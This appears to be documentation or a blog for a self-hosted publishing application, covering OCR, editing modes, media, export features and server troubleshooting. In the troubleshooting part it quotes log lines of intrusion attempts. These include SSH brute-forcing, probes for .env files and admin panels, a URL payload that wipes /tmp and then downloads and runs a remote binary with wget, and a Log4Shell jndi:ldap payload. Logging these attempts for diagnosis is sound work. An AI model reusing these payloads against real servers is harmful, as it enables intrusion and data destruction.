Writing collections, writings and special pages are not the only things one can encounter on the front page of a solution. A feature called Sideshow allows placing a kind of information panel on the side of the front page, which can display results of queries from different databases, lists of writing by some criteria, news from other sites, advertisements, interactive features, etc.

Picture 1. Commands to fetch latest news from two different API-service.
Picture 2. Sideshow on a frontpage of a work that uses content list type "Out of ink".
Picture 3. Sideshow on a frontpage of a work that uses content list type "Plain structure".

To automatically enhance the content of writings, various types of functional embeds may be used. They appear alongside writing when editing the such, just like other placeholders. They can be used to add list of subheading from the writing, a list of similar writings, a list of contributors, a live news section with subheadings, etc., without much effort.

At an earlier stage, the ABBYY Cloud OCR SDK was going to be used for text recognition of image scans, and it worked so reliably for all images containing mainly text that it was already in production, but at some point it was simply removed from ABBYY's offering, although it is still in use by previous customers.

After trying out many alternatives, two different ones have been chosen, the first being Google's Vision API and, if it is not available (e.g. no apikey), OCRSpace. Google is free up to 1000 uses per month. OCRSpace is free continuously, but there is a limit of one megabyte for image files, unless you buy a monthly subscription. Use of Google Vision API requires a credit card, but there is no charge if usage does not exceed a certain level. Google API can be set to be restricted, such as it being available only for use with the Vision API and only within the limits of a specific website.

Google's Vision API can be used to e.g. quickly and easily read old receipts. Texts from books, magazines and websites are also very likely to be recognised in a very usable way.

Other alternatives that have been tried include Amazon and Microsoft's ones, as well as api4ai, but pricing and deployment issues made Google's Vision API the preferred option. Microsoft's service might have been a good choice, but when used via Eden AI, it could often, e.g. fail to see anything where "everyone else" recognized the text just fine. On the other hand, one could easily make ABBYY OCR SDK to produce extra letter artifacts (e.g. "anomalies apparent during visual representation"). After trying to use Microsoft's Azure AI Vision directly, interest was terminated by the notion that it began requiring organizational-level approval for username access or something like that.

OCR functionality is enabled both in the "particular browsing" view when an image is being viewed in the "Large preview" modal window, and in the item preview panel in the adequates view when an image or multi-image is selected. In the first case, the detected text can easily be placed on the clipboard by clicking it or press the Ctrl key while selecting part from the resulting text to do something with it, such as just copy it or use it to search for information from the web. In the second case the resulting text is automatically placed at the end of the item's textual content. Recognizing text from an image is usually a very fast operation when using the Google Vision API, as it takes about a second.

Text recognition from book pages (earlier tests)

ABBYY's text recognition seems useful as it just doesn't leave much to complain about, when using it to images containing scanned texts or screenshots of webpages. As parameters it is possible to define in what languages texts are to be found.

444 VIL THE MECHANISM OF TIME-BINDING of it can be found by analysis practically everywhere. Our problem is to analyse the general case. Let us follow up roughly the process. We assume, for instance, an hypothetical case of an ideal observer who observes correctly and gives an impersonal, unbiased account of what he has observed. Let us assume that the happenings he has observed appeared as: O, and then a new happening ( occurred. At this level of observation, no speaking can be done, and, therefore, I use various fanciful symbols, and not words. The observer then gives a description of the above happenings, let us say a, b, c, d, . . . , x; then he makes an inference from these descriptions and reaches a con- clusion or forms a judgement A about these facts. Wc assume that facts unknown to him, which always exist, are not important in this case. Let us assume, also, that his conclusion seems correct and that the action A" which this conclusion motivates is appropriate. Obviously, we deal with at least three different levels of abstractions: the seen, experienced ., lower order abstractions (un-spcakable) ; then the descriptive level, and, finally, the inferential levels. Let us assume now another individual, Smiths ignorant of struc- ture or the orders of abstractions, of consciousness of abstracting, of s.r.; a politician or a preacher, let us say, a person who habitually iden- tifies, confuses his orders, uses inferential language for descriptions, and rather makes a business out of it. Let us assume that Smith, observes the 'same happenings’. He would witness the happenings O, |, ..... and the happening would appear new to him. The happenings O, be would describe in the form a, b, c, d, . . . , from which fewer descriptions he would form a judgement, reach a conclu- sion, B; which means that he would pass to another order of abstrac- tions. When the new happening occurs, he handles it with an already formed opinion B, and so his description of the happening ( is coloured by his older s.r and no longer the x of the ideal observer, but B(x) --- y. His description of ‘facts’ would not appear as the a, b, c, d, . . . , x, of the ideal observer but a, b, c, d,..., B(x) = y. Next he would abstract on a higher level, form a new judgement, about ‘facts’ a, b, c, d, . . . , B(x) =y, let us say, C. We see how the semantic error was produced. The happenings appeared the ‘same’, yet the unconscious identification of levels brought finally an entirely different conclusion to motivate a quite different action, A diagram will make this structurally clearer, as it is very difficult to explain this by words alone. On the Structural Differential it is shown without difficulty.

HIGHER ORDER ABSTRACTIONS 445 Seen happenings (un- IDEAL OBSERVER SMITH] speakable) (First order abstrac- tions) ............. Ik-5 .X Description III! I I I! I ( Second order abstrac- tions) ............. a, b, c, d, ... x a, b, c, d,... B(x)=y Inferences, conclusions, iqB and what not. I (Third order abstrac- tions) ............. A c Creeds and other se- I I mantic reactions.... A' c I Action A9 e Let us illustrate the foregoing with two clinical examples. In one case, a young boy persistently did not get up in the morning. In another case, a boy persistently took money from his mother’s pocketbook. In both cases, the actions were undesirable. In both cases, the parents unconsciously identified the levels, x was identified with B(x), and con- fused their orders of abstractions. In the first case, they concluded that the boy was lazy; in the second, that the boy was a thief. The parents, through semantic identification, read these inferences into every new ‘description’ of forthcoming facts, so that the parents’ new ‘facts’ became more and more semantically distorted and coloured in evaluation, and their actions more and more detrimental to all concerned. The general conditions in both families became continually worse, until the reading of inferences into descriptions by the ignorant parents produced a semantic background in the boys of driving them to murderous intents. A psychiatrist dealt with the problem as shown in the diagram of the ideal observer. The net result was that the one boy was not ‘lazy’, nor the other a ‘thief’, but that both were ill. After medical attention, of which the first step was to clarify the symbolic semantic situation, though not in such a general way as given here, all went smoothly. Two families were saved from crime and wreck. I may give another example out of a long list which it is unnecessary for our purpose to analyse, because as soon as the ‘consciousness of abstracting’ is acquired, the avoidance of these inherent semantic dif- ficulties becomes automatic. In a common fallacy of 'Petitio

Text recognition from photos (earlier tests)

Nobody likes it when possibly nostalgic places that may have been very significant to someone are presented as photographs in an online city-specific discussion group, to the extent that one might get surprised that they do not have time to relate their feelings about the present and their memories of the past to the kind of intrusive photographs, whose content and the feelings they evoke may not match the observer's personality at all. Hopefully, when the emphasis is not on location or temporality, the response is less likely to be so reluctant. Thus, these photographs taken a couple of decades ago could well be used to demonstrate text recognition from photographs.

However, it turns out that the usefulness of text recognition from photographs leads to the feeling that training of some artificial intelligence component might be required. The Cloudinary OCR addon used here is actually using the Google Vision API and, according to its documentation, cannot be given any parameters to guide text recognition if the texts consist of only Latin alphabets, i.e. the analysis results are the best available. The original images used in the analysis are 2015 x 1512 pixels. Google's Vision API also returns information about where in the image each text is found, which Cloudinary uses to automatically highlight those parts of the images where the analysis indicates that text is present. Discussions have been held with Cloudinary to see if a special pricing for OCR functionality could be made available to users of this publishing application (available on request).

BAR & CAFE, NESS, Billy, KID, PUB, matkavekka, FINN, Veld, verka, MATKATOIMISTO, Malsta, sites, GidenApala, Vedka
HELIOS, LAPPENANNAN KAIHDIN, MARKIISI, Tjärebor, Puh. 4150 405, Lomat meilta, KAIED MARKI, AVONNA, RKIISI mattin
PI, Maksuilinen Alueella, lippuautomaatti, KANGAS-KULMA, + HELIOS, DIE HOU, P., KAMERAY-DIGIKAMERAT-ART-TAR, KANGAS-KU, MARKISE, HELIOS, FUDW DENUR S
KAUPPAKESKO, RMAD, OMEGA, SUNINEN, HLAT S 685 ANTIT, COFFEE HOUSE
Tukip, saile, NISSEN, CO ECA, ©HairStore, SUOMALAINEN
Billy JOKA PAIVA, -03, OMALAINEN KIRJAKAUPPA, Hemter, Z-SSEN, elisa •HairStore, OMALAINEN, DZAIAISS
SELES, NATUMA, NATUMAS, al are-lanp
PUB, matkavekka Vekka, Matkahuolto, FINNRIR, opRa, POCICE

The "spacious" text editing attempts to emulate pages placed side by side and underneath each other by using resizable text areas, where text is automatically run through as many other text areas as necessary as the text is typed or after text areas are resized. It is possible to move from one text area to another by using the arrow keys on the keyboard. If images or other attachments are attached to the writing, they will remain unchanged, even if they are not displayed in this mode to indicate that they are attached to the writing.

Spacious mode has a restriction, at least for now, that the font must be a monospaced (fixed width), and there can be no formatting or included images in the writing (they will get removed). Also, the text cannot be copied with the mouse in such a way as to copy the contents of more than one text areas at a time. At the bottom of the first text area there is a resize button that allows adjusting the size of all text areas, e.g. to have two wide and tall text areas next to each other, three oblong text areas next to each other or small text areas in a grid pattern. Excess text areas are automatically deleted or, if more are needed to accommodate the text, they are added. Adjusting the size of the browser window gives more control over how many text areas can be placed side by side. Those that cannot fit on one row will start a new row of text areas.

In spacious mode, it is possible to move text paragraphs forwards or backwards by placing the cursor over a text paragraph and pressing up or down arrow key together with the Ctrl key. The moving text paragraph will then swap places with the adjacent one. This functionality strengthens the feeling that the text is continuous as the text paragraph moves between text areas as well as in the same text area.

Even when running on a single server KotvaWrite Stories could easily be left for a month without any special monitoring if the number of concurrent users is not overly high. An exception to this assumption may be made in mysterious cases where the memory and disk usage of a virtual server (Linux) momentarily rise quickly and stay in that state for some time. That could crash the application server on which the publishing application is installed. The consequences may not be too critical, as any unfinished database and file saves can/should be fixed and cleaned up semi-automatically, after which a simple restart of the application server might be sufficient to get things back to normal. However, if there is a large number of hacking attempts involved, some OS-level resources may be exhausted, such as the number of open files ("files that are currently being reviewed or modified").

By looking through the log file of the kernel of a Linux operating system in use, one may notice that the Java process has run out of memory on e.g. 15.10.2022, 18.8.2022 and 5.8.2022:

[Sat Oct 15 23:42:37 2022] Out of memory: Killed process 1295081 (java)

[Thu Aug 18 11:45:30 2022] Out of memory: Killed process 272984 (java)

[Fri Aug 5 06:11:36 2022] Out of memory: Killed process 4157049 (java)

To be a bit more specific, the application server on which the publishing application is installed is actually a Java servlet container running on a Java Virtual Machine (JVM), and it is configurable in which limits the associated Java process is allowed to use memory. Stress tests have shown that certain configurations for memory usage are enough - until for some reason they are not.

On the Linux operating system where the publishing application is installed, two APM (Application Performance Monitoring) agents are separately installed, which collect in real time information e.g. about both the operating system and the publishing application, which can then be viewed in a variety of ways in the web interfaces of the APM services (which might be New Relic and Datadog). In these out of memory cases, one and the same thing has always been found to be true: the amount of web traffic has not been a significant factor at a time when virtual process usage has grown by e.g. a factor of 20 and disk is used in a miraculously large amount in a short period of time. At such times, it is not surprising that the database queries might take more than ten seconds to run instead of the normal few milliseconds.

In addition, there is also an external service such as Papertrail, which can be used for redirecting log data from several sources such as the application server and the operating system, so that the log data does not have to be read in a Linux shell, but instead it can be viewed through a certain kind of web interface. A notion about hackers hava emerger from browsing the gathered logs. It seems that someone or some wannabe hackers etc. have done a lot of some kind of crude experimentation to get through defences of the operating system, application server and release application. This has been ongoing throughout 2022, but not once has there been an attempt to cause a Distributed Denial of Service (DDoS) attack, but e.g. rather a slow experimentation with usernames and passwords spread over a long period of time, with no more than a few dozen attempts per minute. That means every minute, every hour, every day and every month. Couldn't they just do something valid and successful the first time?

Contemplating the cause of the timing of out of memory errors tend to lead to a notion that the timing of some of the hacking attempts happen just seconds before the memory runs out, but could that have something do with not having dedicated servers? That means the same physical hardware resources are used by more than one datacenter client (in other words: a server is actually a so-called virtual server). Sometimes the actual hardware can cause failures, so the cause for problems could also be something other than what can be seen in the available logs and dashboards displaying visualized data. However, the data centre service provider said that was no anomaly to report at the time of the problematic out of memory events.

Normally, when using a Hetzner virtual server, one instance of the CPX21 virtual server with 4 GB of memory and 3 slices of CPU time has been enough for "basic use", but there are other explanations for out of memory errors and other strangely anomalous problems than those already mentioned. E.g. the application server might be way behind the latest version, and the could apply to Java, the programming language used on the server side. There are separate settings for when and how the application server and Java clean up memory to remove things that are no longer needed, but they are rather generally left to their default settings. All of this is quite manageable, but may require lots of monitoring and testing to detect borderline cases.

The remainder of this article contains observations about certain out of memory event. And if this is where one can send greetings to the administration of the publishing application, it should be mentioned that some additional configuration could be done to ensure that the IP addresses wouldn't appear as 127.0.0.1 in the application server logs, but as the original IP addresses. Although, could General Data Protection Regulation (GDPR) have anything to say about this?

Plenty of login attempts in the logfile /var/log/messages:

Oct 15 22:52:42 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479370]: Invalid user ktx from 5.51.84.107 port 55716

Oct 15 22:52:42 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479370]: Received disconnect from 5.51.84.107 port 55716:11: Bye Bye [preauth]

Oct 15 22:52:42 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479370]: Disconnected from invalid user ktx 5.51.84.107 port 55716 [preauth]

Oct 15 22:52:56 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479454]: Invalid user postgres from 195.88.87.19 port 53396

Oct 15 22:52:56 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479454]: Received disconnect from 195.88.87.19 port 53396:11: Bye Bye [preauth]

Oct 15 22:52:56 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479454]: Disconnected from invalid user postgres 195.88.87.19 port 53396 [preauth]

Oct 15 22:55:25 snapshot-47300778-centos-2gb-hel1-1-final sshd[2480086]: Invalid user Test from 179.60.147.99 port 37284

Oct 15 22:55:25 snapshot-47300778-centos-2gb-hel1-1-final sshd[2480086]: Connection closed by invalid user Test 179.60.147.99 port 37284 [preauth]

Oct 15 23:13:34 snapshot-47300778-centos-2gb-hel1-1-final sshd[2484695]: Invalid user support from 193.106.191.50 port 49598

Oct 15 23:13:43 snapshot-47300778-centos-2gb-hel1-1-final sshd[2484695]: Connection closed by invalid user support 193.106.191.50 port 49598 [preauth]

Oct 15 23:29:58 snapshot-47300778-centos-2gb-hel1-1-final sshd[2488819]: Invalid user Test from 179.60.147.99 port 55870

Oct 15 23:29:58 snapshot-47300778-centos-2gb-hel1-1-final sshd[2488819]: Connection closed by invalid user Test 179.60.147.99 port 55870 [preauth]

Oct 15 23:39:43 snapshot-47300778-centos-2gb-hel1-1-final sshd[2491284]: Received disconnect from 92.255.85.69 port 26930:11: Bye Bye [preauth]

A few suspicious log lines here and there in the application server log file localhost_access_log:

127.0.0.1 - - [15/Oct/2022:23:03:39 +0200] "POST /core/.env HTTP/1.1" 404 764

127.0.0.1 - - [15/Oct/2022:23:03:39 +0200] "GET /core/.env HTTP/1.1" 404 764

127.0.0.1 - - [15/Oct/2022:23:03:40 +0200] "POST / HTTP/1.1" 200 13720

127.0.0.1 - - [15/Oct/2022:23:03:40 +0200] "POST /core/.env HTTP/1.1" 404 764

127.0.0.1 - - [15/Oct/2022:23:21:47 +0200] "GET /view.jsp?solutionid=539'A=0&writingid=12501 HTTP/1.1" 200 13477

127.0.0.1 - - [15/Oct/2022:23:21:52 +0200] "GET /view.jsp?solutionid=539&writingid=12501'A=0 HTTP/1.1" 200 15507

A few hundred variations to access non-installed web interface:

127.0.0.1 - - [15/Oct/2022:19:02:14 +0200] "GET /db/phpmyadmin/index.php?lang=en HTTP/1.1" 404 782

127.0.0.1 - - [15/Oct/2022:19:02:14 +0200] "GET /sql/phpmanager/index.php?lang=en HTTP/1.1" 404 783

127.0.0.1 - - [15/Oct/2022:19:02:14 +0200] "GET /mysql/pma/index.php?lang=en HTTP/1.1" 404 778

127.0.0.1 - - [15/Oct/2022:19:02:14 +0200] "GET /MyAdmin/index.php?lang=en HTTP/1.1" 404 772

127.0.0.1 - - [15/Oct/2022:19:02:14 +0200] "GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1" 404 784

Trying to gain access by typing parameters and guessing addresses:

127.0.0.1 - - [15/Oct/2022:16:18:21 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+81.161.229.46/jaws;sh+/tmp/jaws HTTP/1.1" 404 756

127.0.0.1 - - [15/Oct/2022:16:18:25 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+81.161.229.46/jaws;sh+/tmp/jaws HTTP/1.1" 404 756

127.0.0.1 - - [15/Oct/2022:16:06:46 +0200] "GET /admin.pl HTTP/1.1" 404 759

195.96.137.4 - - [15/Oct/2022:16:06:46 +0200] "GET /admin.jsa HTTP/1.1" 404 760

127.0.0.1 - - [15/Oct/2022:11:57:08 +0200] "GET /linusadmin-phpinfo.php HTTP/1.1" 404 773

127.0.0.1 - - [15/Oct/2022:11:57:08 +0200] "GET /infos.php HTTP/1.1" 404 760

127.0.0.1 - - [15/Oct/2022:10:22:58 +0200] "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 404 790

127.0.0.1 - - [15/Oct/2022:10:22:58 +0200] "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1" 404 791

82.99.217.202 - - [15/Oct/2022:07:52:03 +0200] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2F218.24.200.243%3A8066%2FTomcatBypass%2FY3D HTTP/1.1" 200 13720

127.0.0.1 - - [15/Oct/2022:01:29:44 +0200] "POST /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7 HTTP/1.1" 404 787

The second log on the application server (catalina) sometimes contains an experiment with imaginary weaknesses:

14-Oct-2022 04:01:50.622 INFO [http-nio2-8080-exec-21] org.apache.coyote.http11.Http11Processor.service Error parsing HTTP request header

 Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level.

       java.lang.IllegalArgumentException: Invalid character found in method name [0x160x030x010x00{0x01;0x993Z0x15e}0x005/0x050x010x00...]. HTTP method names must be tokens

15-Oct-2022 14:21:12.637 INFO [http-nio2-8080-exec-6] org.apache.coyote.http11.Http11Processor.service Error parsing HTTP request header

 Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level.

   java.lang.IllegalArgumentException: Invalid character found in method name [0x160x030x010x00{0xe40x920x88{#{*<0xc80xec0xfc}l0x820x85\0xcc0x1a0xc0/0x0050xc00x000x00...]. HTTP method names must be tokens

Motivation, timing, etc., can be a reason for not starting something at the very moment when, while browsing the web, one notices something worth capturing that may have at least some usability for something. In such a case, a saved screenshot together with the address of the webpage seen should be enough to remind what one was about to write about.

An Android application has been developed on the Minimum Viable Product principle, intended for use only on Android tablets running at least Android 11. The application acts as a receiver for the browser's share function, through which it receives information about the web page open in the browser. Based on this information, the application can open the same page inside that application, so that the user can then take the number of screenshots he needs from it. The screenshots are stored in the Pictures directory of the device and when send to the instance of the publishing application they are stord to the image container Quick saves (every user have such by default). The aim is to keep the transferred images in as high a resolution quality as possible, in order to allow for any cropping that may be necessary at a later stage.

Without using a separate application, one can take a screenshot of the page behind a link by, e.g. adding the link first to an adequate and then selecting the "Take a screenshot" function (see the "Screenshots" section of the instructions) or by taking a screenshot using the functionality of the mobile device or its browser.

On Android, one can take a screenshot of a web page, even a full page, by first typing "chrome://flags" in the address bar, selecting "screenshots for android v2" from the numerous options, and setting it to "enabled". This will enable the "long screenshot" function in the browser, which will save the screenshot taken on the device to a file (to the directory "DCIM/Screenshots", the name of the screenshot file will be formed according to the standard format).

On iPad, one can take a full-page or partial screenshot of a web page by first pressing the Home and Volume buttons briefly, and then choosing between a screen and full-page screenshot. Saving will produce a PDF file if one takes a full-page screenshot, otherwise a PNG file. Both options allow one to do cropping. This works equally well in e.g. Safari and Edge. Title of the web page is automatically contained in the image file name.

The Edge browser, which comes standard with Windows 11, has a basic web snippet feature that lets one take a full-page screenshot of a webpage, or crop it however one likes to. The image file format is always jpeg. Alternatively, one can install a browser extension such as FireShot.

To export pages and annotations from PDF files to an image file, there are PDF reader applications available with an option to directly save a page as an image file to a selected location using the Share function. Sometimes they do not offer to produce a very high resolution image, so a separate application, perhaps costing a couple of euros, specifically designed for this purpose may be a much better option (e.g. selectable image size, pages, file type, etc.). Once the images have been created from the PDF file, the importing view of the publishing application open in a browser of the same device can then be used to import the saved images for use of publishing application's solution or an adequateset.

As well as avoiding causing memory burden on the user when using a publishing application, the intention is not to cause memory burden in terms of cost or manageability of the external services or restrictions. While some external services are only available during the content producing phase, some map services are partially available on a continuous basis if some public domain works contain interactive maps, and are not always unlimited free of charge. To some extent, this is also a business decision, i.e. what can be promised to the client of the publishing application, etc.

Using maps in your writing is a spectacular way to clarify location. An external API is used for reverse geocoding purposes to convert e.g. a given location like a city name into map coordinates. There are a few different choices as a map service to use.

Third-party software components are used to display maps, and initial tryouts in implementing them have given rise to a wide range of ideas on how to allow the user to make use of the maps. Possibilities include the use of stylistically different map tiles, elements to be added on top of the map and route guidance. Another consideration is that the use of map services may be subject to a fee up to a certain level of use and that the number of access times per some time period may be limited. The user must obtain a user acccount for the map service API by registering as a user and then locate the required API key, which is placed in the user-specific settings of the publishing application.

Other particulars under consideration include podcasts, for which there are a few dozen hosting services that offer a supplementary web-based audio player that can be embedded on a web page. Whether to make all of these available, or just some of them? Can such decisions be made more than once? Audio files can be used while waiting for a decision to be made. Transcribes of audio files are also an experimental feature, but perhaps mainly because they requires a bit of extra effort on the part of the user the first time.

It's easier to browse and understand audio recordings when one can simultaneously follow as text what is being said, what was said before and what will be said after a moment. Related to this there is the WebVTT (Web Video Text Tracks Format) standard, which, despite its name, also works with audio files and can be characterised as the representation of the text used in synchronisation with other media such as audio or video.

Making a VTT file from an audio recording is a form of phonetic transcription, or more precisely, transcribing. There are several different online applications for this purpose, but not all of them recognise the Finnish language. They vary widely in pricing, some offer some free transcribing time per month and are very likely to produce different quality.

One could use Google's Speech-to-Text API, which can be accessed directly from the Google Cloud console using a graphical user interface. Basically, an audio file is given as input, a few choices affecting quality is made and then a short moment is waited through. After that download option becames available which can be used to retrieve a SRT file containing the transcribed audio. SRT files are almost identical to the WebVTT files, both being human- and machine-readable text files. Howevery a SRT file needs to be converted to a VTT file, before it can be used. This conversion requires a separate application, which can be a Windows application or, alternatively, one can use any of the many conversion services available on the web (try searching with "convert srt to vtt").

To the publishing application, user does not need to provide any other input other than the url to audio file and url to the vtt file. These are used to generate an audio player, which displays an interactive transcription below it. Here interactivity means that when clicking part of transcribe text, player changes the position where from audio continues to play. As a listener progress through the audio, part of the transcribe text indicates which part of the audio user is currently listening to.

The VTT file must be located in a place that allows distribution of such files either everywhere or to the server used by the publishing application. It is recommended that both the audio file and the vtt file are placed on the CDN Storage provided by the CDN service you are already require to use, as the relevant Cross-Origin Resource Sharing (CORS) settings are easily found in its configuration.

Enabling the transcribe feature requires turning on the experimental functions in the user-spesific settings. Created audio-like particulars remain intact even after the experimental functions are turned off meaning that they will also e.g. get put to backups. In this case, turning on/off the experimental functions will practically just show/hide some interface elements.

When there are e.g. several parts to a published publication series and a user has plenty of other published works, it may be clearer to let a stacked presentation indicate that there several solutions more for a reader to select. In practice, this is done by adding a "#" character (without a space) after the group name in solutions' settings, followed by a number. Then, on the Profile tab of the user preferences, in the "Stackable groups" text field, the information specifying the stack is added, following the syntax "group name#snippet number#snippet name#snippet title". The last two are optional, but the group name and stack number must be included. If there is more than one stack, they are separated by a semicolon.

Clicking on a stack in a solution index will show the solutions in that stack, arranged similarly, without changing the web address.

If you later decide that you don't want to use certain stack, it is not necessary to edit group names in the settings of each solution as it is sufficient to remove the defined stack in the user settings. Any additions to the group names, such as "#1", will then simply remain unused.

One of the things that makes this experimental is that many browsers do not apply the antialiasing effect to images that have been rotated, which then looks rather coarse, especially the images containing text [correction: CSS styling with "transform-style: preserve-3d;" fixes the problem].

Project files

It is possible to save files to a project that may not even have any specific use and which can't be used as straightforwardly as catalog images. Files of any kind can be drag'n'dropped onto the "Files" table, which makes them get saved as project files. These files will gets included in backups, when project is exported and they will also be recreated if the project is imported in the project listing view. Next to the files are Download buttons, which allows a file to be downloaded for use if required. At some point, a file preview function will also be available, which could e.g. used to see what is in the zip package. For some file types, you can already view their contents in the File preview panel (e.g. zip files, image files and text files).

CDN files

If, in addition to storing files, you want to be able to share them publicly with others, you can transfer files to an (existing) CDN service, which in this case is Bunny's CDN Storage. The only effort required is to create a Storage Zone in Bunny's settings, and an apikey for it (will be entered in the user settings of the publishing application in the external services settings). There are two types of these apikeys, one read-only and one readwrite. The latter is needed for file transfer using a separately installed FTP application.

In order for files to be visible in the CDN Files table, files accessible via CDN must be located in a directory starting with "project_" followed by the id number of the project in question. The rest of the directory name can be anything. In the CDN Files table, listed on the same line as the files, are urls, which are the publicly accessible web addresses. You can use them however you like, but one should be aware that these are files distributed via the CDN service, so there is a charge for downloading them via the web and hence via Bunny.

This same CDN file storage can also be used to play audio and video files, e.g. by providing a public address referring to them in the text editing view (under the Embeddables tab, Attach embeddable and from the modal window that opens "Video file" or "Audio file"). No need to use a certain kind of directory name, but you should refer to the Bunny instructions on how to form public addresses.

Importing a project using SFTP (SSH File Transfer Protocol)

In the project listing view, there is a limit of 500 MB for zip-packed files containing a backup of a project. Ones larger than that will have to be transferred using SFTP and importing need to be continue a different way (the functionality to that is available, but there is currently no visual button for it).

In the user settings, there is a Tighter UI option, which slightly reduces the size of almost all fonts in the user interface of a regular user and reduces the space taken up by some visual elements. This is useful e.g. on laptops that don't have a very large screen. On the iPad Pro and many other tablets, the Tighter UI setting may feel appropriate whether is enabled or not.

The first two of these are enabled from the user settings by enabling the experimental functions (manifested as additional buttons in the project managing view), while the third is likely to be used more heavily to the extent that it is readily available.

Printable version (for solutions having "plain structure" as content list type)

Any solution that has been prepared for online reading can be made into a PDF version with a single click of relevant button. The resulting PDF will contain a separate cover page, all collections of writings in their own parts with all printable contents. Page numbers in the footers with section information and before/after appecialpages are included. Images will be as well positioned as on the web, font choices are exactly right and otherwise results are generally just fine. Currently it is preferred to use content list type of "plain structure" as others like "presentation page" and blog-like would give unexpected results.

This has been done in a completely different way to the previous attempt, where a TeX file was first generated, containing both styling and content, and then a PDF file was generated from it. Instead, the external service generates the PDF file from the same ingredients that browsers use to generate web pages, i.e. HTML code, CSS styling and JavaScript code. An important addition is the use of CSS3 Paged Media:

"CSS module specifies how pages are generated and laid out to hold fragmented content in a paged presentation. It adds functionality for controlling page margins, page size and orientation, and headers and footers, and extends generated content to enable page numbering and running headers / footers." (CSS Paged Media Module Level 3. W3C Working Draft, 18 October 2018.)

Creating a PDF version works well when targeting paper size of A4, but for other sizes the implementation is still under consideration.

Many browsers have not implemented this standard and that is why printing directly from the browser does not provide optimal results as such, when the purpose is to include page numbering etc. E.g. the Firefox browser does not make much use of CSS Paged Media (since last tested), but Edge and Chrome do. However, a problem with using them is that they either include extra information like the date in the header and footer, or the header and footer contents have to be completely empty (the printing settings only have an either/or option).

Actually, as the external service that is supposed to be used for generating PDF files requires a fee to be paid, process is decreased by a one phase so that a user is served with a downloadable HTML file that contains all the mentioned "ingredients" and content. User can then use a browser to print it, if the browser has enough support for the CSS3 Paged Media.

Publishing a solution elsewhere (server-independent HTML version)

It is possible to export a solution contained in the project into a zip file, so that the contents of that package can be copied via FTP or SCP to a directory on a server of one's choice and be made publicly viewable in a browser. A solution exported this way wouldn't have differences in its outlook, but the contents would be completely "static" (not generated separately at every page load). The images in the work can be distributed via a CDN service, retrieved directly from that another server by the browser or they be contained in relevant web pages as encoded adata.

If necessary, the project list view has a function to generate an index list of published works, but if the user wants to edit the index list in the HTML editor, some know-how about building websites might be required. In practice, generated index.html file contains all images as encoded data with CSS files / JavaScript libraries included.

Exporting a writing together with its images

When preparing a writing and its images for publishing elsewhere, such as in a discussion forum or a Facebook group, writing and its images can be exported to a zip package containing three different versions of the writing. One of them is an unstyled HTML version with tags p, h1 and h2 (lists are converted to text paragraphs). The other two are plaintext, with the difference that one does not have a blank line after the text paragraphs, which can streamline workflows, e.g. when copying and pasting. Pictureshows' image filenames are named in a way to make it easier to identify which ones belong to the same pictureshow. The feature is available in the "text editing" view by selecting "Export for use elsewhere" from the editor's menu.

Desktop publishing software InDesign has for a long time allowed all its functionality to be controlled by ExtendScript, so after a while of exploring the InDesign's API, it became clear that it is indeed possible to be used to do what had already been envisioned and what was not dexterous enough with the LaTeX typesetting system. A backup of a project (zip package) contains all the essentials for creating an InDesign version, and in practice that is needed to do is to run a single script in InDesign that first which directory the decompressed files are in and then generates the same work in different form based on the available writings, style definitions etc.

It has long been possible to give editing rights to users of an instance of the publishing application on a project-by-project basis, and each writing has an Authors field where one can tell who the authors are. Sharing session code after logging in is also a way to give access rights, but then one would be giving access to everything one can do with that user account. The internal functionality of the publishing application currently includes the possibility of realtime device-to-device communication between users of an instance of the publishing application, which, if further developed, could make collaboration between users more sophisticated than just giving editing rights.

These are somewhat experimental without well defined purpose, so everything related to multiusers (authors and co-editors) are only available via enabling the experimental features in the user settings.

A user can add authors to both their own writings and writings belonging to projects to which he has received editing rights. They will be used in contexts in which the authors' details etc. will be displayed. E.g. in the fine-tuning view, you can add the contributors placeholder to the writing, which will be used to generate author information in the final version of the writing. The function for this can be found in the Tools menu ("Functional embed: contributors"). That placeholder can be converted to plain text by Alt-clicking.

These "authors" can be created in the Authors tab of the user preferences, and they can be transferred from one user to another if necessary. They can be used to communicate to readers the role played by each author in the creation of the writing. Later on, images can also be used, but at this stage these authors are text only. Users with editing rights will not be able to remove authors other than their own.

These authors are loosely decoupled from writings in such a way that if a project is first exported and then deleted from among other projects, the relationship between them is broken. The backup will only include a hint of the author's name, but on the other hand there will be a semi-automatic function in the Usabilities view to reconnect authors.

This view that needs a separate login account is not intended to be used very often. Usually, only at the very beginning of becoming publishing application customer, this view need to be accessed briefly so that CDN address can be set. Without it being set all the public pages' footer contain a message that mentions about missing CDN address.

It provides, among other things, the possibility to create new users and the editing of user-specific constraints. Some areas of the managing view contain just information e.g. "how much outbound transfer bandwidth has been used in the current billing cycle".

A user's project can be transferred from one user to another in this interface, but only if the catalogs of that project are not used by any other project. If this condition is not met, the project transfer will not even be started. The transfer requires as parameters the project id and the username of the user to whom the project is to be transferred. From a database point of view, such a transfer is a quick operation, since as a relational database it is not necessary to make changes in many places if the project has no image catalogs at all and if it has it is still quicly done. If a project being transferred to another user has adequatesets associated with it, these associations are removed, as the adequatesets are not intended to be transferable from one user to another, at least for the time being.

Occasionally, on rare occasions, one might choose from the normal user accounts the one that will become the main user, i.e. the one whose public solkutions will be listed when going to the domain's index page. Otherwise, a user listing would be displayed, from which one could select to see the user-specific listing of published solutions.

If necessary (highly unlikely), there's a simple button that can be used to clear the contents of long-lived caches that form in the central memories of the servers in use. Such caches include a partial copy of the database contents with relations, as it is much faster to retrieve information from them than from the database, as the database is located on a slower SSD.

This user-specific view is very prototypical and not just in its naming. It is intended to

